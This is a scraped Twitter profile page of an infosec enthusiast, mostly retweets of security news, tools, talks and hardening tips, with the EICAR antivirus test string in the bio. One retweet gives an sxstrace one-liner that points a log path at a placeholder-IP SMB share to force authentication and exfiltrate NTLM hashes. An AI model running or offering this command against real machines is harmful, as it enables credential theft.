|
rvn_2p
@
carloz_spicy
Ulm, Germany
|
|
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
|
|
|
1.550
Tweetovi
|
182
Pratim
|
33
Osobe koje vas prate
|
| Tweetovi |
|
rvn_2p
@carloz_spicy
|
22 min |
|
aberaberaber der Linksextremismus
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
majek04
@majek04
|
4. velj |
|
It's possible to hack a machine with DMA attacks - you need to be able to hot-plug PCI or firewire device.
IOMMU was said to be a decent solution to the problem. But nope. It turns out IOMMU can be still broken because... computers are hard.
cs.technion.ac.il/users/wwwb/cgi… pic.twitter.com/cylUxrqJsD
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Gergely Revay
@geri_revay
|
4. velj |
|
Awesome #wannacry reversing tutorials from @ghidraninja
Part 1: youtube.com/watch?v=Sv8yu1…
Part 2: youtube.com/watch?v=Q90uZS…
#reverseengineering #malware #ghidra
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Vincent Le Toux (Paris)
@mysmartlogon
|
2. velj |
|
#PingCastle 2.8.0.0 released !!!
pingcastle.com/download/
4 clicks and 2 <enter>, that what's between you and the hard truth of your AD security.
Example of report: pingcastle.com/PingCastleFile…
github: github.com/vletoux/pingca…
Changelog: raw.githubusercontent.com/vletoux/pingca… pic.twitter.com/1oQXuIJcdi
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
owen white
@ochlophobist
|
31. sij |
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Simon Weckert
@simon_deliver
|
1. velj |
|
99 smartphones are transported in a handcart to generate virtual traffic jam in Google Maps. Through this activity, it is possible to turn a green street red which has an impact in the physical world by navigating cars on another route! #googlemapshacks simonweckert.com/googlemapshack… pic.twitter.com/6KcMm1XgAF
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Catalin Cimpanu
@campuscodi
|
31. sij |
|
Here's a collection of pew-pew cyber maps:
threatmap.checkpoint.com
cybermap.kaspersky.com
fireeye.com/cyber-map/thre…
threatmap.fortiguard.com
threatmap.bitdefender.com
map.lookingglasscyber.com pic.twitter.com/aFqteiPRVB
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
hashcat
@hashcat
|
1. velj |
|
For those of you using a NV GPU with Volta or Turing chipset, listen up! We hacked our way into the post-48k GPU shared memory region. This improved bcrypt cracking performance by an average of 25%. For instance a GTX2080Ti improved from 42116 H/s to 54770 H/s pic.twitter.com/jm6gICcu9h
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
v∅id natalie()
@ntkvby
|
29. sij |
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
winnie
@msgpeek
|
30. sij |
|
Uploaded my slides from "Attacking Jenkins" talk at #unfuck2019: msgpeek.net/slides/attacki…, blogpost will follow during the next days.
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Silvio Cesare
@silviocesare
|
30. sij |
|
Train with me and @infosectcbr to find bugs and vulnerabilities in C systems software blackhat.com/us-20/training…
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Richard Gold
@drshellface
|
28. sij |
|
1. Windows Defender 2. EDR 3. Automated defanging of documents 4. Disabling macros, OLE, DDE, etc. 5. Disabling Windows Script Hosting 6. Private VLANs 7. Application whitelisting 8. Users not being local admins 9. 2FA on everything 10. Up-to-date patching twitter.com/jhencinski/sta…
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Jon Barber
@BonJarber
|
28. sij |
|
I'm looking for a new role doing something AppSec/Red Team/OSINT related in Seattle or remote. My strong suite is web and mobile security, with lots of bug bounty experience.
My resume and contact info are on bonjarber.com, DMs open as well. RT's are much appreciated.
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Matty Mariansky
@mmariansky
|
28. sij |
|
why our office is switching to Fortnite pic.twitter.com/86AfeXv38k
|
||
|
|
||
|
rvn_2p
@carloz_spicy
|
29. sij |
|
Christopher Lobo verfolgt mich in meinen Träumen. Alles sagen er kann mir nicht weh tun.
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Kevin Beaumont
@GossiTheDog
|
27. sij |
|
Big change coming to Windows Server this March - insecure LDAP requests will be rejected by default. That's a change in behaviour which will absolutely break things in some orgs
How to get in front of the issue: opensecurity.global/forums/topic/2…
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
kmkz
@kmkz_security
|
24. sij |
|
A new way to exfiltrate #NTLM hash by forcing #SMB auth ?
Check this #Microsoft #lolbin:
sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a
cc @Oddvarmoe
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
RetroGames e. V.
@retrogamesev
|
25. sij |
|
Ebenfalls neu in der Ausstellung. pic.twitter.com/0dIE4ibTfm
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Yarden Shafir
@yarden_shafir
|
16. sij |
|
After a lot of work and some crypto-related delays, I couldn't be more proud to publish @aionescu's and mine latest research - The complete overview of CET internals on Windows (so far!):
windows-internals.com/cet-on-windows/
|
||
|
|
||
| rvn_2p proslijedio/la je tweet | ||
|
Joe Vest
@joevest
|
21. sij |
|
We released a Red Teaming book! Red Team Development and Operations. It's been a crazy project that has existed in many forms. It started as simple notes, came together as a SANS class, and will now live as a book. Read about it here. threatexpress.com/blogs/2020/red… twitter.com/minis_io/statu… pic.twitter.com/DvdRa4mGWw
|
||
|
|
||